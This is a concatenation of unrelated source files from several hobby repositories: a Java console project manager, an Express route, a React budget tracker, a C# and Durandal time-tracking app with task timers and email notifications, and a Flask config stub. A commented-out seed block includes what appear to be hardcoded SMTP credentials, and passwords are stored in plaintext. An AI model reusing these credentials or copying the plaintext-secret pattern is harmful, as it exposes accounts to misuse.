// user input for a choice to pick between the if statements
System.out.println("""
enter 1 :to Change the due date of the project.
enter 2 :to Change fee paid to date.
enter 3 :to Update a contractor contact details
enter 4:to Finalise the project""");
Scanner inputChoice = new Scanner(System.in);
int choice = inputChoice.nextInt();
if (choice == 1) {//Changes the due date
Scanner inputD = new Scanner(System.in);
System.out.println("new: ");
String newDeadline = inputD.nextLine();
projectOne.setDeadline(newDeadline);
System.out.println("Changes have been made.\n");
System.out.println(projectOne);
}
if (choice == 2) {//Changes fee paid to date
Scanner inputP = new Scanner(System.in);
System.out.println("new: ");
double newP = inputP.nextDouble();
projectOne.setPaid(newP);
System.out.println("Changes have been made.\n");
System.out.println(projectOne);
}
if (choice == 3) {//Changes contractor contact details
Scanner inputChoice2 = new Scanner(System.in);
int choice2 = inputChoice.nextInt();
// Choice2 picks which contact detail to edit from the contractor
System.out.println("""
enter 1 :to Change Email
enter 2 :to Change Telephone number
enter 3 :to Change address""");
if (choice2 == 1) {
Scanner inputE = new Scanner(System.in);
System.out.println("new: ");
String newE = inputE.nextLine();
contractor.setEmailC(newE);
System.out.println("Changes have been made.\n");
System.out.println(projectOne);
}
if (choice2 == 2) {
Scanner inputT = new Scanner(System.in);
System.out.println("new: ");
int newT = inputT.nextInt();
contractor.setTelephoneC(newT);
System.out.println("Changes have been made.\n");
System.out.println(projectOne);
}
if (choice2 == 3) {
Scanner inputA = new Scanner(System.in);
System.out.println("new: ");
String newA = inputA.nextLine();
contractor.setAddressC(newA);
System.out.println("Changes have been made.\n");
System.out.println(projectOne);
}
}
if (choice == 4) {// prints invoice
System.out.println("Invoice:");
System.out.println(customer.toString());
if (totalFee != paid){
double invoice = totalFee - paid;
System.out.println("customer must still pay:" + invoice);
}
}
}
}
<file_sep>class projectObject {
// attributes
private int projectNum;
private String projectName;
private String buildType;
private String projectAddress;
private int erfNum;
private double totalFee;
private double paid;
private String deadline;
private Architect architect;
private Contractor contractor;
private Customer customer;
// Create the constructor of the object to save initial values
public projectObject(int projectNum, String projectName, String buildType, String projectAddress, int erfNum, double totalFee, double paid, String deadline, Architect architect, Contractor contractor, Customer customer) {
this.projectNum = projectNum;
this.projectName = projectName;
this.buildType = buildType;
this.projectAddress = projectAddress;
this.erfNum = erfNum;
this.totalFee = totalFee;
this.paid = paid;
this.deadline = deadline;
this.architect = architect;
this.contractor = contractor;
this.customer = customer;
}
// setters
public void setProjectNum(int newNum) {
projectNum = newNum;
}
public void setProjectName(String newName) {
projectName = newName;
}
public void setBuildType(String newBuildType) {
buildType = newBuildType;
}
public void setProjectAddress(String newAddress) {
projectAddress = newAddress;
}
public void setProjectErfNum(int newErfNum) {
erfNum = newErfNum;
}
public void setTotalFee(double newTotalFee) {
totalFee = newTotalFee;
}
public void setPaid(double newPaid) {
paid = newPaid;
}
public void setDeadline(String newDeadline) {
deadline = newDeadline;
}
// toString method to print information to screen
public String toString() {
String output ="\nProject Number: " + projectNum+
"\nProject Name: " + projectName +
"\nBuilding Type: " + buildType+
"\nProject Address: " + projectAddress+
"\nErf Num: " + erfNum+
"\nTotal Fee: " +totalFee+
"\nAmount Paid: " + paid+
"\nErf Num: " + erfNum+
"\nDeadline: " + deadline+
"\n"+
"\n" + architect+
"\n"+
"\n" + contractor+
"\n"+
"\n" + customer;
return output;
}
}
|
09da38920e8f5a638de870433ce83b9eeac08779
|
[
"Markdown",
"Java"
] | 3
|
Markdown
|
cloudeuz/Capstone-Project-Manager
|
c5e38ad14d6e1ef5e05059a7d4cf99a2d6dfc903
|
bd5de8352de32897be5dac28390ffb294d6005dd
|
refs/heads/main
|
<file_sep>var express = require('express');
var router = express.Router();
/* GET home page. */
router.get('/', function(req, res, next) {
var name1 = 'Niraj3';
var datajson = { title: 'Express3', loginname: name1 };
res.render('index', datajson);
});
module.exports = router;
|
8f1e5c082023d14765b0b7deed6415bb1df1a835
|
[
"JavaScript"
] | 1
|
JavaScript
|
NirajChamp/myExpressApp
|
d34e86c104894e3fbe5bc708124c4cff3da58aef
|
a030a90ce3ed79b21cc1583a69f29c7798a9c102
|
refs/heads/master
|
<repo_name>GastonLell/budget-control<file_sep>/src/components/ExpenseItem/ExpenseItem.js
import { Stack, Text } from "@chakra-ui/react";
import PropTypes from 'prop-types';
const ExpenseItem = ({description, count}) => {
return(
<Stack d="flex" direction="row" justifyContent="space-between" p={2} borderBottom="1px" borderColor="gray.300">
<Text>{description}</Text>
<Text>{count}</Text>
</Stack>
)
}
ExpenseItem.propTypes = {
description: PropTypes.string.isRequired,
count: PropTypes.number.isRequired,
}
export default ExpenseItem;<file_sep>/src/App.js
import { useEffect, useState } from "react";
import { ChakraProvider, Stack, Text } from "@chakra-ui/react";
import ExpenseForm from "./components/ExpenseForm/ExpenseForm";
import InitialBudget from "./components/InitialBudget/InitialBudget";
import ExpenseList from "./components/ExpenseList/ExpenseList";
import BudgetControl from "./components/BudgetControl/BudgetControl";
function App() {
//presupuesto
const [budget, setBudget] = useState(0);
//restante presupuesto
const [remainingBudget, setRemainingBudget] = useState(0);
//ver o no pregunta inicial de presupuesto
const [showQuestion, setShowQuestion] = useState(true);
//gastos
const [expense, setExpense] = useState([]);
//control de usseEffect para crear gastos
const [createdSpeading, setCreatespeading] = useState(false);
const [speading, setSpeading] = useState({});
//ver detalle gastos o numeros
const [detail, setDetail] = useState(false);
useEffect(() => {
if (createdSpeading) {
//agrega nuevo presupuesto
setExpense([...expense, speading]);
//actualiza el presupuesto
setRemainingBudget(remainingBudget - speading.count);
//vuelve a false
setCreatespeading(false);
}
}, [speading, createdSpeading, remainingBudget, expense]);
return (
<ChakraProvider>
<Stack bgGradient="linear(to-t, white, blue.900)" h="100vh">
<Stack>
<Text
textAlign="center"
fontSize={{base: "5xl" ,md: "6xl"}}
color="white"
fontWeight="200"
p={{base: 2, md: 4}}
>
<NAME>
</Text>
</Stack>
{showQuestion ? (
<Stack>
<InitialBudget
setBudget={setBudget}
setRemainingBudget={setRemainingBudget}
setShowQuestion={setShowQuestion}
/>
</Stack>
) : (
<Stack
bg="whiteAlpha.900"
d="flex"
direction={{base: "column", md: "row"}}
w={{base: "90%" ,md: "70%"}}
mx="auto !important"
p={{base: 4 ,md: 6}}
>
<Stack w="100%">
<ExpenseForm
setSpeading={setSpeading}
setCreatespeading={setCreatespeading}
/>
</Stack>
<Stack w="100%">
<Text
fontSize="4xl"
color="gray"
fontWeight="200"
textAlign="center"
mb={2}
>
Ver detalles
</Text>
{detail ? (
<BudgetControl
setDetail={setDetail}
budget={budget}
remainingBudget={remainingBudget}
/>
) : (
<ExpenseList setDetail={setDetail} expense={expense} />
)}
</Stack>
</Stack>
)}
</Stack>
</ChakraProvider>
);
}
export default App;
<file_sep>/src/components/ExpenseForm/ExpenseForm.js
import React, { useState } from "react";
//para obtener id
import shortid from "shortid";
//componentes chakraa
import {
Text, Stack,
Input, Button,
FormControl, FormLabel,
Alert, AlertIcon
} from "@chakra-ui/react";
//documentacion componente
import PropTypes from 'prop-types';
const ExpenseForm = ({setSpeading, setCreatespeading}) => {
const [description, setDescription] = useState("")
const [count, setCount] = useState("")
const [error, setError] = useState(false)
const handleSubmit = (e) => {
e.preventDefault();
//valido
if(count < 1 || isNaN(count) || description.trim() === "") {
setError(true);
return;
}
//si pasa la validacion
setError(false);
const spending = {
description,
count,
id: shortid.generate(),
}
//guardar gasatos
setSpeading(spending);
setCreatespeading(true)
//
//resetear form
setDescription("");
setCount(0);
};
return (
<Stack w="100%" borderRadius={6}>
<Text
fontSize="4xl"
color="gray"
fontWeight="200"
textAlign="center"
mb={2}
>
Agregar tus gastos
</Text>
<form onSubmit={handleSubmit}>
<Stack spacing={6}>
<FormControl>
<FormLabel>Nombre gasto</FormLabel>
<Input
type="text"
placeholder="Ej. Transporte"
value={description}
onChange={(e) => setDescription(e.target.value)}
/>
</FormControl>
<FormControl>
<FormLabel>Cantidad gasto</FormLabel>
<Input
type="number"
placeholder="Ej. Transporte"
value={count}
onChange={(e) => setCount(parseInt(e.target.value))}
/>
</FormControl>
<Button colorScheme="twitter" type="submit">
Agregar gasto
</Button>
</Stack>
</form>
{error ? (
<Alert status="error">
<AlertIcon />
por favor, revise sus campos
</Alert>
) : null
}
</Stack>
);
};
ExpenseForm.propType = {
setSpeading: PropTypes.func.isRequired,
setCreatespeading: PropTypes.func.isRequired,
}
export default ExpenseForm;
<file_sep>/src/components/ExpenseList/ExpenseList.js
import { Button, Stack } from "@chakra-ui/react";
import ExpenseItem from '../ExpenseItem/ExpenseItem';
import PropTypes from 'prop-types';
const ExpenseList = ({expense, setDetail }) => {
return(
<Stack w="100%">
<Button variant="outline" colorScheme="linkedin" onClick={() => setDetail(true)}>Ver presupuesto</Button>
{
expense.map(spending => <ExpenseItem key={spending.id} {...spending }/>)
}
</Stack>
)
}
ExpenseList.propTypes = {
expense: PropTypes.array.isRequired,
setDetail: PropTypes.func.isRequired
}
export default ExpenseList;
|
604c5628c58486020843e2d47443c42df9009e13
|
[
"JavaScript"
] | 4
|
JavaScript
|
GastonLell/budget-control
|
406cad060fa4fa68132a6fb7fd0b546b066ecca2
|
e8ee6e124a32dbe5a744b1a5feee7fcec4c41fb4
|
refs/heads/master
|
<file_sep>class AppointmentsController < ApplicationController
before_action :set_appointment, only: [:show, :edit, :update, :destroy]
before_action :set_objects
# GET /appointments
# GET /appointments.json
def index
@appointments = Appointment.all
end
# GET /appointments/1
# GET /appointments/1.json
def show
@patient_name = Patient.find(@appointment.patient_id).name
@physician_name = Physician.find(@appointment.physician_id).name
end
# GET /appointments/new
def new
@appointment = Appointment.new
end
# GET /appointments/1/edit
def edit
end
# POST /appointments
# POST /appointments.json
def create
Rails.logger.debug "appointment_params is #{appointment_params.inspect}"
@appointment = Appointment.new(appointment_params)
Rails.logger.debug "@appointment set to #{@appointment.inspect}"
respond_to do |format|
if @appointment.save
format.html { redirect_to @appointment, notice: 'appointment was successfully created.' }
format.json { render action: 'show', status: :created, location: @appointment }
else
format.html { render action: 'new' }
format.json { render json: @appointment.errors, status: :unprocessable_entity }
end
end
end
# PATCH/PUT /appointments/1
# PATCH/PUT /appointments/1.json
def update
respond_to do |format|
if @appointment.update(appointment_params)
format.html { redirect_to @appointment, notice: 'appointment was successfully updated.' }
format.json { head :no_content }
else
format.html { render action: 'edit' }
format.json { render json: @appointment.errors, status: :unprocessable_entity }
end
end
end
# DELETE /appointments/1
# DELETE /appointments/1.json
def destroy
Rails.logger.debug ">>>>>>> entred appointment destroy"
@appointment.destroy
respond_to do |format|
format.html { redirect_to appointments_url }
format.json { head :no_content }
end
end
private
# Use callbacks to share common setup or constraints between actions.
def set_appointment
@appointment = Appointment.find(params[:id])
end
def set_objects
@patients = Patient.all.map{ |p| [p.name, p.id]}
@physicians = Physician.all.map{ |p| [p.name, p.id]}
end
# Never trust parameters from the scary internet, only allow the white list through.
def appointment_params
params.require(:appointment).permit(:appointment_date, :patient_id, :physician_id)
end
end
|
61f0f06013144b6fa72f88706ab2a18dd8d8e561
|
[
"Ruby"
] | 1
|
Ruby
|
pchhatwal/sandbox
|
03c67d9b9975fe1d1cda472d52463f1dc01991c3
|
01748e1dde892f6937c31c9cd45318cc2173ee6e
|
refs/heads/master
|
<repo_name>TechLord-Forever/codemeter<file_sep>/CodeMeter/CodeMeter.HttpService/Migrations/Configuration.cs
namespace CodeMeter.HttpService.Migrations
{
using System;
using System.Data.Entity;
using System.Data.Entity.Migrations;
using System.Linq;
internal sealed class Configuration : DbMigrationsConfiguration<CodeMeter.HttpService.Models.DataContext>
{
public Configuration()
{
AutomaticMigrationsEnabled = true;
ContextKey = "CodeMeter.HttpService.Models.DataContext";
}
protected override void Seed(CodeMeter.HttpService.Models.DataContext context)
{
// This method will be called after migrating to the latest version.
// You can use the DbSet<T>.AddOrUpdate() helper extension method
// to avoid creating duplicate seed data. E.g.
//
// context.People.AddOrUpdate(
// p => p.FullName,
// new Person { FullName = "<NAME>" },
// new Person { FullName = "<NAME>" },
// new Person { FullName = "<NAME>" }
// );
//
//context.Configurations.Add(new Models.Configuration()
//{
// CheckRunning = true,
// CheckInterval = 1,
// NotificationInterval = 15,
// Recepient = "<EMAIL>",
// Sender = "<EMAIL>",
// SendEmail = true,
// Smtp = "mail.brizb.rs",
// Port = 26,
// Username = "<EMAIL>",
// Password = "<PASSWORD>"
//});
}
}
}
<file_sep>/CodeMeter/CodeMeter.Client/app/viewmodels/task.js
define(["jquery", "knockout", "durandal/app", "durandal/system", "plugins/router", "services/data", "komapping"], function ($, ko, app, system, router, data, mapper) {
var
// Properties
task = mapper.fromJS({
ID: 0,
ProjectID: 0,
Name: '',
Description: ''
}),
isBusy = ko.observable(''),
// Handlers
save = function () {
isBusy(true);
if (!task.ID()) {
data.insertTask(task).done(function (id) {
task.ID(id);
}).fail(function () {}).always(function () {
isBusy(false);
})
} else {
data.updateTask(task).done(function () {
}).fail(function () {}).always(function () {
isBusy(false);
});
}
},
// Lifecycle
activate = function (projectId, taskId) {
if (taskId) {
return data.getTask(taskId).done(function (t) {
mapper.fromJS(t, task);
}).fail(function () {});
} else {
mapper.fromJS({
ID: 0,
ProjectID: projectId,
Name: '',
Description: ''
}, task);
}
},
deactivate = function () {};
return {
// Place your public properties here
task: task,
isBusy: isBusy,
save: save,
activate: activate,
deactivate: deactivate
};
});<file_sep>/README.md
codemeter
=========
<file_sep>/CodeMeter/CodeMeter.Client/app/utils/utils.js
define(function () {
var formatTime = function (timeDiff) {
var seconds = Math.round(timeDiff % 60);
timeDiff = Math.floor(timeDiff / 60);
var minutes = Math.round(timeDiff % 60);
timeDiff = Math.floor(timeDiff / 60);
var hours = Math.round(timeDiff % 24);
return (hours < 10 ? "0" + hours : hours) + ":" + (minutes < 10 ? "0" + minutes : minutes) + ":" + (seconds < 10 ? "0" + seconds : seconds);
};
return {
formatTime: formatTime,
}
});<file_sep>/CodeMeter/CodeMeter.HttpService/Controllers/ProjectsController.cs
using System;
using System.Collections.Generic;
using System.Data.Entity;
using System.Linq;
using System.Net;
using System.Net.Http;
using System.Web.Http;
using System.Web.Http.Cors;
using CodeMeter.HttpService.Models;
namespace CodeMeter.HttpService.Controllers
{
[EnableCors("*", "*", "*")]
public class ProjectsController : ApiController
{
public IList<Project> Get()
{
using (var c = new DataContext())
{
var projects = c.Projects.Include(x => x.Tasks).Include(x => x.Tasks.Select(t => t.Logs)).ToArray();
foreach (var project in projects)
{
project.SetTotals();
project.Tasks = null;
}
return projects;
}
}
public Project Get(int id)
{
using (var c = new DataContext())
{
return c.Projects.Single(x => x.ID == id);
}
}
public HttpResponseMessage Post(HttpRequestMessage request, Project project)
{
using (var c = new DataContext())
{
project.Guid = Guid.NewGuid();
c.Projects.Add(project);
c.SaveChanges();
}
var response = request.CreateResponse(HttpStatusCode.Created, project.ID);
return response;
}
public void Put(Project project)
{
using (var c = new DataContext())
{
c.Entry(project).State = EntityState.Modified;
c.SaveChanges();
}
}
public void Delete(int id)
{
using (var c = new DataContext())
{
c.Entry(new Project() { ID = id }).State = EntityState.Deleted;
c.SaveChanges();
}
}
}
}
<file_sep>/CodeMeter/CodeMeter.HttpService/Global.asax.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Web;
using System.Web.Http;
using System.Web.Mvc;
using System.Web.Optimization;
using System.Web.Routing;
using CodeMeter.HttpService.Models;
using CodeMeter.HttpService.Quartz;
using Quartz;
using Quartz.Impl;
namespace CodeMeter.HttpService
{
// Note: For instructions on enabling IIS6 or IIS7 classic mode,
// visit http://go.microsoft.com/?LinkId=9394801
public class WebApiApplication : System.Web.HttpApplication
{
protected void Application_Start()
{
AreaRegistration.RegisterAllAreas();
WebApiConfig.Register(GlobalConfiguration.Configuration);
FilterConfig.RegisterGlobalFilters(GlobalFilters.Filters);
RouteConfig.RegisterRoutes(RouteTable.Routes);
BundleConfig.RegisterBundles(BundleTable.Bundles);
using (var c = new DataContext())
{
var cfg = c.Configurations.Single();
var scheduler = StdSchedulerFactory.GetDefaultScheduler();
scheduler.Start();
var job = JobBuilder.Create<CheckJob>().WithIdentity("Check").Build();
var trigger =
TriggerBuilder.Create()
.WithIdentity("trigger")
.WithSimpleSchedule(s => s.WithIntervalInMinutes(cfg.CheckInterval).RepeatForever())
.StartAt(DateTime.Now.AddMinutes(cfg.CheckInterval))
.Build();
scheduler.ScheduleJob(job, trigger);
}
}
}
}<file_sep>/CodeMeter/CodeMeter.HttpService/Models/TaskLog.cs
using System;
namespace CodeMeter.HttpService.Models
{
public class TaskLog : Entity
{
public Task Task { get; set; }
public int TaskID { get; set; }
public DateTime? Start { get; set; }
public DateTime? End { get; set; }
//public int Elapsed
//{
// get
// {
// if (!Start.HasValue) return 0;
// var end = End.HasValue ? End.Value : DateTime.Now;
// return (int)end.Subtract(Start.Value).TotalSeconds;
// }
//}
}
}<file_sep>/CodeMeter/CodeMeter.HttpService/Models/Project.cs
using System;
using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
using System.ComponentModel.DataAnnotations.Schema;
using System.Linq;
namespace CodeMeter.HttpService.Models
{
public class Project : Entity
{
public Guid Guid { get; set; }
[Required]
[StringLength(256)]
public string Name { get; set; }
[StringLength(256)]
public string Client { get; set; }
[StringLength(2048)]
public string Description { get; set; }
public ICollection<Task> Tasks { get; set; }
[Range(0, 1000)]
public int Price { get; set; }
[NotMapped]
public int TotalTime { get; set; }
[NotMapped]
public decimal Total { get; set; }
public void SetTotals()
{
if (Tasks == null) return;
foreach (var task in Tasks)
{
task.SetStartAndEnd();
}
TotalTime = Tasks.Sum(x => x.ElapsedSeconds);
Total = Price*TotalTime/3600M;
}
}
}<file_sep>/CodeMeter/CodeMeter.Client/app/services/data.js
define(['plugins/http'], function(http) {
//var url = "http://localhost:52214/api/";
var url = "http://codemeter.brizb.rs/api/";
return {
getProjects: function() {
return http.get(url + 'projects');
},
getProject: function(id) {
return http.get(url + 'projects', {id: id});
},
saveProject: function(project) {
return http.post(url + 'projects', project);
},
updataProject: function(project) {
return http.put(url + 'projects', project);
},
deleteProject: function(id) {
return http.remove(url + 'projects/' + id);
},
getTasks: function(projectId) {
return http.get(url + 'project/' + projectId + '/tasks');
},
getTask: function(taskId) {
return http.get(url + 'project/0/tasks/' + taskId);
},
getLastTaskRun: function (taskId) {
return http.get(url + 'task/lastRun/' + taskId);
},
insertTask: function (task) {
return http.post(url + 'project/' + task.ProjectID() + '/tasks/', task);
},
updateTask: function (task) {
return http.put(url + 'project/' + task.ProjectID() + '/tasks/' + task.ID(), task);
},
deleteTask: function (id) {
return http.remove(url + 'project/0/tasks/' + id);
},
startTask: function (id) {
return http.put(url + 'task/StartTask/' + id);
},
stopTask: function (id) {
return http.put(url + 'task/EndTask/' + id);
},
getConfiguration: function() {
return http.get(url + 'configuration');
},
updateConfiguration: function (cfg) {
return http.put(url + 'configuration', cfg);
}
};
})<file_sep>/CodeMeter/CodeMeter.Client/app/viewmodels/configuration.js
define(["jquery", "knockout", "durandal/app", "durandal/system", "plugins/router", "services/data", "komapping"], function ($, ko, app, system, router, data, mapper) {
var
// Properties
cfg = mapper.fromJS({
ID: '',
CheckInterval: 0,
CheckRunning: false,
NotificationInterval: 15,
Password: '',
Port: 26,
Recepient: '',
SendEmail: false,
SendSms: false,
Sender: '',
Smtp: '',
Ssl: false,
Username: ''
}),
isBusy = ko.observable(false),
// Handlers
save = function() {
isBusy(true);
data.updateConfiguration(cfg).done(function(){
}).fail(function(){
}).always(function(){
isBusy(false);
})
},
// Lifecycle
activate = function () {
return data.getConfiguration().done(function (configuration) {
mapper.fromJS(configuration, cfg);
})
},
deactivate = function () {};
return {
// Place your public properties here
isBusy: isBusy,
cfg: cfg,
save: save,
activate: activate,
deactivate: deactivate
};
});<file_sep>/CodeMeter/CodeMeter.Client/app/viewmodels/taskrunner.js
define(["jquery", "knockout", "durandal/app", "durandal/system", "plugins/router", "services/data", "moment", "utils/utils"], function ($, ko, app, system, router, data, moment, utils) {
var
// Properties
taskName = ko.observable(''),
TIME_FORMAT = "DD.MM.YYYY HH:mm:ss",
tId,
projectId,
error = ko.observable(''),
isRunning = ko.observable(false),
timer,
started = ko.observable('N/A'),
ended = ko.observable('N/A'),
elapsedTime,
elapsed = ko.observable('00:00:00'),
formatTime = function (timeDiff) {
},
startTimer = function() {
isRunning(true);
timer = setInterval(function () {
elapsedTime += 1;
elapsed(utils.formatTime(elapsedTime));
}, 1000, true);
},
// Handlers
start = function () {
if (isRunning()) return;
data.startTask(tId).done(startTimer).fail(function (err) {
error(err.responseText);
});
},
pause = function () {
if (!isRunning()) return;
data.stopTask(tId).done(function (task) {
elapsedTime = task.ElapsedSeconds;
formatTime(elapsedTime);
ended(moment(task.EndTime).format(TIME_FORMAT));
isRunning(false);
clearInterval(timer);
}).fail(function () {});
},
stop = function () {
pause();
router.navigate("#tasks/" + projectId);
},
// Lifecycle
activate = function (taskId) {
error('');
return data.getLastTaskRun(taskId).done(function (task) {
tId = task.ID;
projectId = task.ProjectID;
taskName(task.Name);
elapsedTime = task.ElapsedSeconds;
elapsed(utils.formatTime(elapsedTime));
started(task.StartTime ? moment(task.StartTime).format(TIME_FORMAT) : 'N/A')
ended(task.EndTime ? moment(task.EndTime).format(TIME_FORMAT): 'N/A')
if (task.IsRunning) {
startTimer();
}
}).fail(function () {});
},
deactivate = function () {
clearInterval(timer);
};
ko.computed
return {
// Place your public properties here
activate: activate,
deactivate: deactivate,
taskName: taskName,
start: start,
pause: pause,
stop: stop,
elapsed: elapsed,
isRunning: isRunning,
error: error,
started: started,
ended: ended
};
});<file_sep>/CodeMeter/CodeMeter.HttpService/Quartz/CheckJob.cs
using System;
using System.Net;
using System.Net.Mail;
using CodeMeter.HttpService.Models;
using Quartz;
using System.Linq;
namespace CodeMeter.HttpService.Quartz
{
public class CheckJob : IJob
{
public void Execute(IJobExecutionContext context)
{
using (var c = new DataContext())
{
var cfg = c.Configurations.Single();
if (cfg.CheckRunning && (cfg.SendEmail || cfg.SendSms))
{
var running = c.TaskLogs.Where(x => !x.End.HasValue);
var now = DateTime.Now;
foreach (var taskLog in running)
{
var timeRunning = (int)now.Subtract(taskLog.Start.Value).TotalMinutes;
if (timeRunning > cfg.NotificationInterval)
{
if (cfg.SendEmail)
{
try
{
using (var smtp = new SmtpClient(cfg.Smtp, cfg.Port))
{
smtp.EnableSsl = cfg.Ssl;
smtp.DeliveryMethod = SmtpDeliveryMethod.Network;
smtp.UseDefaultCredentials = false;
smtp.Credentials = new NetworkCredential(cfg.Username, cfg.Password);
var mail = new MailMessage(cfg.Sender, cfg.Recepient)
{
Subject = "CodeMeter Notification",
Body = "Task " + taskLog.TaskID + " is running for " + timeRunning + " minutes"
};
smtp.Send(mail);
}
}
catch
{
}
}
if (cfg.SendSms)
{
}
}
}
}
}
}
}
}<file_sep>/CodeMeter/CodeMeter.HttpService/Models/Configuration.cs
using System.ComponentModel.DataAnnotations;
namespace CodeMeter.HttpService.Models
{
public class Configuration : Entity
{
public int CheckInterval { get; set; }
public int NotificationInterval { get; set; }
public bool CheckRunning { get; set; }
public bool SendSms { get; set; }
public bool SendEmail { get; set; }
[StringLength(255)]
public string Recepient { get; set; }
[StringLength(255)]
public string Sender { get; set; }
[StringLength(255)]
public string Smtp { get; set; }
public int Port { get; set; }
[StringLength(255)]
public string Username { get; set; }
[StringLength(255)]
public string Password { get; set; }
public bool Ssl { get; set; }
}
}<file_sep>/CodeMeter/CodeMeter.HttpService/Controllers/TasksController.cs
using System;
using System.Net;
using System.Net.Http;
using System.Web.Http;
using System.Web.Http.Cors;
using CodeMeter.HttpService.Models;
using System.Data.Entity;
using System.Linq;
namespace CodeMeter.HttpService.Controllers
{
[EnableCors("*", "*", "*")]
public class TasksController : ApiController
{
public Project Get(int projectId)
{
using (var c = new DataContext())
{
var project = c.Projects.Include(x => x.Tasks).Include(x => x.Tasks.Select(t => t.Logs)).Single(x => x.ID == projectId);
foreach (var task in project.Tasks)
{
task.Project = null;
task.SetStartAndEnd();
task.Logs = null;
}
return project;
}
}
public Task Get(int projectId, int taskId)
{
using (var c = new DataContext())
{
return c.Tasks.Single(x => x.ID == taskId);
}
}
public HttpResponseMessage Post(HttpRequestMessage request, int projectId,Task task)
{
using (var c = new DataContext())
{
c.Tasks.Add(task);
c.SaveChanges();
}
var r = request.CreateResponse(HttpStatusCode.Created, task.ID);
return r;
}
public void Put(int projectId, int taskId, Task task)
{
using (var c = new DataContext())
{
c.Entry(task).State = EntityState.Modified;
c.SaveChanges();
}
}
public void Delete(int projectId, int taskId)
{
using (var c = new DataContext())
{
c.Entry(new Task{ID = taskId}).State = EntityState.Deleted;
c.SaveChanges();
}
}
[System.Web.Http.HttpGet]
public Task LastRun(int taskId)
{
using (var c = new DataContext())
{
var task = c.Tasks.Include(x => x.Logs).Single(x => x.ID == taskId);
task.SetStartAndEnd();
task.Logs = null;
return task;
}
}
[System.Web.Http.HttpPut]
public HttpResponseMessage StartTask(HttpRequestMessage request, int taskId)
{
using (var c = new DataContext())
{
if (c.Tasks.Any(x => x.IsRunning))
{
return request.CreateResponse(HttpStatusCode.MethodNotAllowed, "Some task already is running");
}
var task = c.Tasks.Single(x => x.ID == taskId);
task.Logs.Add(new TaskLog()
{
Start = DateTime.Now
});
task.IsRunning = true;
c.SaveChanges();
return request.CreateResponse(HttpStatusCode.OK, taskId);
}
}
[System.Web.Http.HttpPut]
public Task EndTask(HttpRequestMessage request, int taskId)
{
using (var c = new DataContext())
{
var task = c.Tasks.Include(x => x.Logs).Single(x => x.ID == taskId);
if (!task.IsRunning) return task;
task.IsRunning = false;
var logs = task.Logs.ToArray();
var last = logs.Last();
last.End = DateTime.Now;
task.SetStartAndEnd();
c.SaveChanges();
task.Logs = null;
return task;
}
}
}
}
<file_sep>/CodeMeter/CodeMeter.Client/app/viewmodels/projects.js
define(["jquery", "knockout", "durandal/app", "durandal/system", "plugins/router", "services/data", "utils/utils"], function ($, ko, app, system, router, data, utils) {
var
// Properties
timer,
refresh,
projects = ko.observableArray([]),
// Handlers
onCreateNew = function () {
router.navigate('#project');
},
onGotoProject = function (project) {
router.navigate("#tasks/" + project.ID);
},
onEditProject = function (project) {
router.navigate("#project/" + project.ID);
},
onDeleteProject = function (project) {
app.showMessage("Do you really want to delete project?", null, ["No", "Yes"]).then(function(result) {
if (result === "Yes") {
data.deleteProject(project.ID).done(function(){
projects.remove(project);
}).fail(function() {});
}
});
},
load = function () {
return data.getProjects().done(function(data) {
data.forEach(function(proj) {
proj.TotalTime = utils.formatTime(proj.TotalTime);
proj.Total = Math.round(proj.Total, 2);
});
projects(data);
}).fail(function(err) {
});
}
// Lifecycle
activate = function () {
refresh = app.on('refresh').then(load);
timer = setInterval(load, 30 * 1000);
return load();
},
deactivate = function () {
refresh.off();
clearInterval(timer);
};
return {
// Place your public properties here
activate: activate,
deactivate: deactivate,
projects: projects,
onCreateNew: onCreateNew,
onGotoProject: onGotoProject,
onEditProject: onEditProject,
onDeleteProject: onDeleteProject
};
});
<file_sep>/CodeMeter/CodeMeter.HttpService/Models/DataContext.cs
using System.Data.Entity;
namespace CodeMeter.HttpService.Models
{
public class DataContext : DbContext
{
static DataContext()
{
Database.SetInitializer(new MigrateDatabaseToLatestVersion<DataContext, Migrations.Configuration>());
}
public DataContext() : base("CodeMeter")
{}
public DbSet<Project> Projects { get; set; }
public DbSet<Task> Tasks { get; set; }
public DbSet<TaskLog> TaskLogs { get; set; }
public DbSet<Configuration> Configurations { get; set; }
}
}<file_sep>/CodeMeter/CodeMeter.HttpService/Controllers/ConfigurationController.cs
using System.Data.Entity;
using System.Linq;
using System.Web.Http;
using System.Web.Http.Cors;
using CodeMeter.HttpService.Models;
namespace CodeMeter.HttpService.Controllers
{
[EnableCors("*", "*", "*")]
public class ConfigurationController : ApiController
{
public Configuration GetConfiguration()
{
using (var c = new DataContext())
{
return c.Configurations.Single();
}
}
public void Put(Configuration configuration)
{
using (var c = new DataContext())
{
c.Entry(configuration).State = EntityState.Modified;
c.SaveChanges();
}
}
}
}
<file_sep>/CodeMeter/CodeMeter.HttpService/Models/Task.cs
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.ComponentModel.DataAnnotations;
using System.ComponentModel.DataAnnotations.Schema;
using System.Linq;
namespace CodeMeter.HttpService.Models
{
public class Task : Entity
{
public Task()
{
Logs = new Collection<TaskLog>();
}
[Required]
[StringLength(256)]
public string Name { get; set; }
[StringLength(2048)]
public string Description { get; set; }
public Project Project { get; set; }
public int ProjectID { get; set; }
public bool IsRunning { get; set; }
public ICollection<TaskLog> Logs { get; set; }
[NotMapped]
public DateTime? StartTime { get; set; }
[NotMapped]
public DateTime? EndTime { get; set; }
[NotMapped]
public int ElapsedSeconds { get; set; }
internal void SetStartAndEnd()
{
var first = Logs.FirstOrDefault();
var last = Logs.LastOrDefault();
StartTime = first != null ? first.Start : null;
EndTime = last != null && last.End.HasValue ? last.End.Value : (StartTime != null ? DateTime.Now : (DateTime?)null);
if (StartTime == null || EndTime == null)
{
return;
}
ElapsedSeconds = 0;
foreach (var taskLog in Logs)
{
if (taskLog.End == null)
{
taskLog.End = DateTime.Now;
}
ElapsedSeconds += (int)taskLog.End.Value.Subtract(taskLog.Start.Value).TotalSeconds;
}
}
}
}
|
cb7ac3adec5ed1db3d75a68f9da7158b5d383069
|
[
"JavaScript",
"C#",
"Markdown"
] | 18
|
C#
|
TechLord-Forever/codemeter
|
5787ea21fc84d5f12d73c281a86ef7833850bf2a
|
4c33f909c476feceaafd2320a78a30e9fcec2553
|
refs/heads/main
|
<repo_name>itstep-python05/HR_DEP<file_sep>/hrdep/config.py
from flask import Flask
from flaskext.mysql import MySQL
app = Flask(__name__)
